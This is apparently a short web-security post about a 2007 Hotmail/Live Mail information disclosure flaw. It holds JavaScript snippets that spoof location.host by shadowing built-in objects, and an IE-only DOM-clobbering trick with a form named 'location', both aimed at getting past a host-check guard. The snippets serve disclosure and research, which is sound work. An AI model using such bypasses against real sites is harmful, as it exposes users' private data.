Hotmail/Live Mail Information Disclosure vulnerability (Date: March 16, 2007) - hoshikuzu

link

Hotmail/Live Mail Information Disclosure vulnerability ::sla.ckers.org web application security forum :: Full Disclosure

important

This information is at (Date: March 16, 2007)

Guess where this data came from? Right, from just that script, with a constant URL

guard...? MS's way at March 16, 2007

if (location.host == "www.msn.com" || location.host == "my.msn.com" || ...) {

nice trick ! making the location of this script dynamic

var location = {host: "whatever you want", toString: function() {return this.host}};

var window = {location: location};alert(window.location.host);

alert(window.location);

alert(location.host);

nice trick ! making the location of this script dynamic

var document = {location: {href: "test", toString: function() {return this.href}}};

alert(document.location);

alert(document.location.href);

alert(window.document.location);

Mario's way

from http://maliciousmarkup.blogspot.com/2008/11/html-form-controls-reviewed.html

for IE6, IE7, IE8 (except for IE8 standard mode)

<form id="location" host="my.msn.com" ></form>

<script>

alert(location.host); // my.msn.com

</script>